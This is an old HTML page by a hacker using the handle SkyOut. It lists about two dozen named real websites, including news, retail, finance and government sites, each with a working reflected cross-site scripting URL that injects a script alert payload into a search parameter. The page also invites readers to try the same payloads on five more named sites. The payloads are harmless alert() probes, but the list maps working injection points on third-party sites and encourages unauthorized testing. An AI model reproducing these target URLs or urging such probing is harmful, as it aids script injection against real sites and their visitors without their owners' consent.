This is a huge list of many popular web sites that are susceptible to cross site scripting attacks with links to examples.
dc68f43e7f38423c3b967f1c5acbfbbfb67b59ed2d10ffba0afd65884a01b955
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>RESEARCH ON XSS VULNERABILITIES</title>
</head>
<body>
<h2><u>XSS VULNERABILITIES STILL IN MANY INTERNATIONAL AND IMPORTANT SITES</u></h2>
<h3><font color="#FF0000">Author:</font> SkyOut <font color="#FF0000">Date:</font> 18.July 20006 <font color="#FF0000">Site:</font> www.eof-project.net</h3>
<p>Today I began searching around for XSS flaws, I searched for standard errors in
several websites while handling script inputs. As expected I found more and more
websites being vulnerable to this type of attack, but for my surprise even very
popular sites are vulnerable to this standard vulnerability!</p>
<p>Here you have the complete list of all sites I found in only a few hours:</p>
<p><b>I just used those two scripts to check the vulnerability in input fields:</b></p>
<p><b>1)</b> < script > alert ( 31337 ) < / script ></p>
<p><b>2)</b> < script > alert ( " XSS " ) < / script ></p>
<hr>
<ul>
<li> polizei.hessen.de <a href="http://www.polizei.hessen.de/internetzentral/broker?uTem=3b130c53-9286-7cf3-362d-61611142c388&class=net.icteam.cms.utils.search.IndexManager%3Bcurrentsize%3D1%3Bpagesize%3D10%3Bcms%3Dinternet&uMenSearch=00080ee1-825a-f6f8-6373-a91bbcb63046&class_text=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=3&y=2" target="_blank">[XSS]</a></li>
<li> arte-tv.com <a href="http://www.arte-tv.com/de/search__results/4996,templateId=noncache.html?searchString=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> sport.ard.de <a href="http://sport.ard.de/sp/komponente/suchen/index.jhtml?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> suchnase.de <a href="http://www.suchnase.de/cgi-bin/search.cgi?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search.x=0&search.y=0" target="_blank">[XSS]</a></li>
<li> killsometime.com <a href="http://www.killsometime.com/search/search.asp?Query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Submit=Search" target="_blank">[XSS]</a></li>
<li> pangora.n24.de <a href="http://pangora.n24.de/query.html?qu=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> n-tv.de <a href="http://n-tv.de/472.html?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&m=n" target="_blank">[XSS]</a></li>
<li> walmartstores.com <a href="http://walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> directory.fsf.org <a href="http://directory.fsf.org/search/fsd-search.py?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> hr-online.de <a href="http://www.hr-online.de/website/suche/home/index.jsp?posted=true&mode=2&q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li>pcworld.co.uk <a href="http://www.pcworld.co.uk/martprd/store/pcw_page.jsp?BV_SessionID=@@@@1041303741.1153247930@@@@&BV_EngineID=cceladdigdeifeicflgceggdhhmdgml.0&page=SimpleSearchProducts&low_bound=0&up_bound=0&criterion=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&AtimeStamp=3330686849" target="_blank">[XSS]</a></li>
<li> pbs.org <a href="http://www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&btnG.x=0&btnG.y=0&neighborhood=none" target="_blank">[XSS]</a></li>
<li> online.wsj.com <a href="http://online.wsj.com/public/quotes/main.html?symbol_or_name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=12&y=10&sym_name_switch=name" target="_blank">[XSS]</a></li>
<li> npr.org <a href="http://www.npr.org/search.php?text=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> weather.com <a href="http://www.weather.com/search/enhanced?whatprefs=&what=WeatherLocalUndeclared&lswe=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&lswa=WeatherLocalUndeclared&from=whatwhere&where=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> mut.de <a href="http://www.mut.de/main/main.asp?SID=%7B1E81CCA7-3990-4309-B530-38374563CA4F%7D&TOKEN=%7B9BCA61EA-C95E-4427-8B0F-46DCA3B0BCA0%7D&quicksearch=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&QuickSearchCombo=home&TitelWieAutor=TRUE&Page=home%2Fbooklist&GO.x=0&GO.y=0" target="_blank">[XSS]</a></li>
<li> mitp.de <a href="http://mitp.de/vmi/mitp/suche?senden=1&suThema=alle&suSchlagwort=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> americanexpress.com <a href="http://search.americanexpress.com/amex/?q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&site=amerexpress&client=amerexpress&output=amerexpress&restrict=US" target="_blank">[XSS]</a></li>
<li> netscape.com <a href="http://channels.netscape.com/pf/lookup.jsp?issuetype=1005&nameorts=1&LookupValue=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> thestreet.com <a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&symb=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> de.atari.com <a href="http://de.atari.com/index.php?pg=search&search=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> ati.com <a href="http://search.ati.com/nasearch.asp?Query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&go.x=0&go.y=0&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New" target="_blank">[XSS]</a></li>
<li> winamp.com <a href="http://winamp.com/videos/search.php?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
</ul>
<hr>
<p><b>And now its up to you ;) Go to the following sites and type the XSS examples from above into the search field =)</p>
<p>(without the whitespaces of course...)</b></p>
<ul>
<li> evite.com <a href="http://evite.com/" target="_blank">[LINK]</a></li>
<li> knuddels.de <a href="http://www2.knuddels.de/dprint/static/de_pwd.html" target="_blank">[LINK]</a></li>
<li> gutenberg-gym.de <a href="http://gutenberg-gym.de/element.php?name=Search" target="_blank">[LINK]</a></li>
<li> greenpeace.org.uk <a href="http://greenpeace.org.uk/" target="_blank">[LINK]</a></li>
<li> hakin9.org <a href="http://en.hakin9.org/" target="_blank">[LINK]</a></li>
</ul>
<p><b><font color="#FF0000">FEEDBACK: vx.sky.out [at] gmail [dot] com</font></b></p>
</body>
</html>